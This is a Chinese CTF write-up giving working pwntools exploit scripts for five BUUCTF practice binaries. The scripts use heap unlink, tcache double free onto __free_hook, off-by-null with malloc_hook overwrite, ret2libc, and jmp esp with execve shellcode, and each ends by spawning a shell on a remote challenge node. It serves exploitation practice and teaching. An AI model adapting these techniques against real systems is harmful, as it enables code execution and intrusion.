buuctf 强制转换无符号数溢出 任意地址读、跳转 _printf_chk free_hook jmpesp scanf输入过长触发malloc
文章目录
- zctf2016_note2
- oneshot_tjctf_2016
- ciscn_2019_en_3
- x_ctf_b0verfl0w
- GKCTF2020]Domo
zctf2016_note2
本题的漏洞在这里
有符号数和无符号数进行了比较,转换为无符号数, 我们把size设为0,那-1就永远大于i,就可以溢出了
本题可以改got表,heap_ptr的地址也可以找到,那就unlink
改成这样就行,利用chunk1的溢出
然后改atoi为system, 输入sh就行了
exp:
from pwn import *
from LibcSearcher import *
local_file = './note2'
local_libc = '/root/glibc-all-in-one/libs/2.23/libc-2.23.so'
remote_libc = '/root/glibc-all-in-one/libs/2.23/libc-2.23.so'
select = 1
if select == 0:
r = process(local_file)
libc = ELF(local_libc)
else:
r = remote('node3.buuoj.cn', 29525)
libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se = lambda data :r.send(data)
sa = lambda delim,data :r.sendafter(delim, data)
sl = lambda data :r.sendline(data)
sla = lambda delim,data :r.sendlineafter(delim, data)
sea = lambda delim,data :r.sendafter(delim, data)
rc = lambda numb=4096 :r.recv(numb)
rl = lambda :r.recvline()
ru = lambda delims :r.recvuntil(delims)
uu32 = lambda data :u32(data.ljust(4, '\0'))
uu64 = lambda data :u64(data.ljust(8, '\0'))
info = lambda tag, addr :r.info(tag + ': {:#x}'.format(addr))
def debug(cmd=''):
gdb.attach(r,cmd)
def menu(choice):
sla('option--->>', str(choice))
def add(size, content):
menu(1)
sla('Input the length of the note content:(less than 128)\n', str(size))
sla('Input the note content:\n', content)
def show(index):
menu(2)
sla('Input the id of the note:\n', str(index))
def edit(index, content):
menu(3)
sla('note:\n', str(index))
sla(']\n', '1')
sla('TheNewContents:', content)
def free(index):
menu(4)
sla('note:\n', str(index))
sla('\n', 'aa')
sla('\n', 'bb')
#--------------------------------------------------------------------------------------------------------
target = 0x602120
p = 'a'*8 + p64(0x61) + p64(target-0x18) + p64(target-0x10)
add(0x40, p)
add(0, '')
add(0x80, 'bbbb')
free(1)
p2 = 'b'*0x10 + p64(0x60) + p64(0x90)
add(0, p2)
free(2)
edit(0, 'a'*0x18 + p64(elf.got['atoi']))
show(0)
libc_base = uu64(ru('\x7f')[-6:]) - libc.sym['atoi']
system = libc_base + libc.sym['system']
info('libc_base', libc_base)
edit(0, p64(system))
sl('/bin/sh\x00')
r.interactive()
oneshot_tjctf_2016
shot
可以读一次和跳转一次,那就读来获得libc,跳转到og
exp:
from pwn import *
from LibcSearcher import *
local_file = './oneshot_tjctf_2016'
local_libc = '/root/glibc-all-in-one/libs/2.23/libc-2.23.so'
remote_libc = '/root/glibc-all-in-one/libs/2.23/libc-2.23.so'
select = 1
if select == 0:
r = process(local_file)
libc = ELF(local_libc)
else:
r = remote('node3.buuoj.cn', 29219)
libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se = lambda data :r.send(data)
sa = lambda delim,data :r.sendafter(delim, data)
sl = lambda data :r.sendline(data)
sla = lambda delim,data :r.sendlineafter(delim, data)
sea = lambda delim,data :r.sendafter(delim, data)
rc = lambda numb=4096 :r.recv(numb)
rl = lambda :r.recvline()
ru = lambda delims :r.recvuntil(delims)
uu32 = lambda data :u32(data.ljust(4, '\0'))
uu64 = lambda data :u64(data.ljust(8, '\0'))
info = lambda tag, addr :r.info(tag + ': {:#x}'.format(addr))
def debug(cmd=''):
gdb.attach(r,cmd)
p = str(elf.got['puts'])
sl(p)
ru('0x')
libc_base = int(rc(16), 16) - libc.sym['puts']
info('libc_base', libc_base)
o_g = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
og = libc_base + o_g[0]
sl(str(og))
r.interactive()
记得用str和int
ciscn_2019_en_3
有点生气,
这题有个_printf_chk可以泄漏libc
18的uaf,free3次,然后add,然后free_hook
exp:
from pwn import *
from LibcSearcher import *
local_file = './ciscn_2019_en_3'
local_libc = '/root/glibc-all-in-one/libs/2.27/libc-2.27.so'
remote_libc = '/root/glibc-all-in-one/libs/2.27/libc-2.27.so'
select = 1
if select == 0:
r = process(local_file)
libc = ELF(local_libc)
else:
r = remote('node3.buuoj.cn', 27414)
libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se = lambda data :r.send(data)
sa = lambda delim,data :r.sendafter(delim, data)
sl = lambda data :r.sendline(data)
sla = lambda delim,data :r.sendlineafter(delim, data)
sea = lambda delim,data :r.sendafter(delim, data)
rc = lambda numb=4096 :r.recv(numb)
rl = lambda :r.recvline()
ru = lambda delims :r.recvuntil(delims)
uu32 = lambda data :u32(data.ljust(4, '\0'))
uu64 = lambda data :u64(data.ljust(8, '\0'))
info = lambda tag, addr :r.info(tag + ': {:#x}'.format(addr))
def debug(cmd=''):
gdb.attach(r,cmd)
def menu(choice):
sla('choice:', str(choice))
def add(size, content):
menu(1)
sla('size of story: \n', str(size))
sea('story: \n', content)
def free(index):
menu(4)
sla('index:\n', str(index))
sl('%p%p%p')
ru('0x200x')
libc_base = int(rc(12), 16) - libc.sym['read'] - 17
info('libc_base', libc_base)
free_hook = libc_base + libc.sym['__free_hook']
info('free_hook', free_hook)
o_g = [0x4f2c5, 0x4f322, 0x10a38c]
og = libc_base + o_g[1]
sl('b')
#--------------------------------------------------------------------------------------------------------
add(0x18, 'aa')
free(0)
free(0)
free(0)
add(0x18, p64(free_hook))
add(0x18, 'aa')
add(0x18, p64(og))
sl('4')
sl('1')
r.interactive()
x_ctf_b0verfl0w
这题没防护,r2libc和jmpesp都可以
r2libc
exp:
from pwn import *
from LibcSearcher import *
local_file = './b0verfl0w'
local_libc = '/usr/lib/x86_64-linux-gnu/libc-2.29.so'
remote_libc = '/usr/lib/x86_64-linux-gnu/libc-2.29.so'
select = 1
if select == 0:
r = process(local_file)
#libc = ELF(local_libc)
else:
r = remote('node3.buuoj.cn', 26414)
#libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se = lambda data :r.send(data)
sa = lambda delim,data :r.sendafter(delim, data)
sl = lambda data :r.sendline(data)
sla = lambda delim,data :r.sendlineafter(delim, data)
sea = lambda delim,data :r.sendafter(delim, data)
rc = lambda numb=4096 :r.recv(numb)
rl = lambda :r.recvline()
ru = lambda delims :r.recvuntil(delims)
uu32 = lambda data :u32(data.ljust(4, '\0'))
uu64 = lambda data :u64(data.ljust(8, '\0'))
info = lambda tag, addr :r.info(tag + ': {:#x}'.format(addr))
def debug(cmd=''):
gdb.attach(r,cmd)
fun_got = elf.got['puts']
fun_plt = elf.plt['puts']
main = elf.sym['main']
p1 = flat(['a'*0x20, 'b'*4, fun_plt, main, fun_got])
sl(p1)
#log.info(rl())
fun_addr = uu32(ru('\xf7')[-4:])
#fun_addr = uu32(rc(4))
info('fun_addr', fun_addr)
libc = LibcSearcher('puts', fun_addr)
libcbase = fun_addr - libc.dump('puts')
system_addr = libcbase + libc.dump('system')
binsh_addr = libcbase + libc.dump('str_bin_sh')
p2 = flat(['a'*0x20, 'b'*4, system_addr, 'b'*4, binsh_addr])
sl(p2)
r.interactive()
jmpesp
ROPgadget --binary x_ctf_b0verfl0w --only ‘jmp|ret’
exp:
from pwn import *
from LibcSearcher import *
local_file = './b0verfl0w'
local_libc = '/usr/lib/x86_64-linux-gnu/libc-2.29.so'
remote_libc = '/usr/lib/x86_64-linux-gnu/libc-2.29.so'
select = 1
if select == 0:
r = process(local_file)
#libc = ELF(local_libc)
else:
r = remote('node3.buuoj.cn', 26414)
#libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se = lambda data :r.send(data)
sa = lambda delim,data :r.sendafter(delim, data)
sl = lambda data :r.sendline(data)
sla = lambda delim,data :r.sendlineafter(delim, data)
sea = lambda delim,data :r.sendafter(delim, data)
rc = lambda numb=4096 :r.recv(numb)
rl = lambda :r.recvline()
ru = lambda delims :r.recvuntil(delims)
uu32 = lambda data :u32(data.ljust(4, '\0'))
uu64 = lambda data :u64(data.ljust(8, '\0'))
info = lambda tag, addr :r.info(tag + ': {:#x}'.format(addr))
def debug(cmd=''):
gdb.attach(r,cmd)
jmp_esp = 0x08048504 # jmp esp
sh= "\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
print len(sh)
p = sh.ljust(0x24, '\x00')
p += p32(jmp_esp) + asm('sub esp, 0x28; jmp esp')
sl(p)
r.interactive()
记得用自己写的shellcode,自带的太长了
[
GKCTF2020]Domo
scanf输入长度过长会触发malloc
https://www.xuenixiang.com/thread-2351-1-1.html
https://blog.play2win.top/2020/05/27/GKCTF%202020%20Domo%E5%88%86%E6%9E%90/
https://blog.csdn.net/weixin_44145820/article/details/106310483
http://www.pwn4fun.com/pwn/gkctf-2020-partwp.html#Demo
off by null的洞
add(0x80, ‘aa’)#0
add(0x10, ‘aa’)#1
add(0x68, ‘aa’)#2
add(0xf0,‘aa’)#3
add(0x80, ‘aa’)#4
#------------------------------------------------------------------------------------------------------------------------------------
p = ‘a’*0x60+p64(0x120)
free(2)
add(0x68, p)
#------------------------------------------------------------------------------------------------------------------------------------
free(2)
free(0)
free(3)
exp:
from pwn import *
from LibcSearcher import *
local_file = './domo'
local_libc = '/lib/x86_64-linux-gnu/libc-2.23.so'
remote_libc = '/lib/x86_64-linux-gnu/libc-2.23.so'
select = 1
if select == 0:
r = process(local_file)
libc = ELF(local_libc)
else:
r = remote('node3.buuoj.cn', 27766)
libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se = lambda data :r.send(data)
sa = lambda delim,data :r.sendafter(delim, data)
sl = lambda data :r.sendline(data)
sla = lambda delim,data :r.sendlineafter(delim, data)
sea = lambda delim,data :r.sendafter(delim, data)
rc = lambda numb=4096 :r.recv(numb)
rl = lambda :r.recvline()
ru = lambda delims :r.recvuntil(delims)
uu32 = lambda data :u32(data.ljust(4, '\0'))
uu64 = lambda data :u64(data.ljust(8, '\0'))
info = lambda tag, addr :r.info(tag + ': {:#x}'.format(addr))
def debug(cmd=''):
gdb.attach(r,cmd)
def menu(choice):
sla('> ', str(choice))
def add(size, content):
menu(1)
sla('size:\n', str(size))
sea('content:\n', content)
def free(index):
menu(2)
sla('index:\n', str(index))
def show(index):
menu(3)
sla('index:\n', str(index))
def edit(addr, content):
menu(4)
sla('addr:\n', str(addr))
sea('num:\n', content)
add(0x80, 'aa')
add(0x10, 'aa')
free(0)
add(0x80, '\xe0')
show(0)
libc_base = uu64(ru('\x7f')[-6:]) - 192 - 0x10 - libc.sym['__malloc_hook']
info('libc_base', libc_base)
malloc_hook = libc_base + libc.sym['__malloc_hook']
o_g = [0x45216,0x4526a,0xf02a4,0xf1147]
og = libc_base + o_g[3]
add(0x68, 'aa')#2
add(0xf0, 'aa')#3
add(0x80, 'aa')#4
p = 'a'*0x60+p64(0x120)
free(2)
add(0x68, p)
free(2)
free(0)
free(3)
p = 'a'*0x80+p64(0)+p64(0x21)+'a'*0x10+p64(0)+p64(0x71)+p64(malloc_hook-0x23)
add(len(p), p)
add(0x68, 'aa')
add(0x68, 'a'*0x13+p64(og))
sl('2'*2012)
#debug()
sl('1')
r.interactive()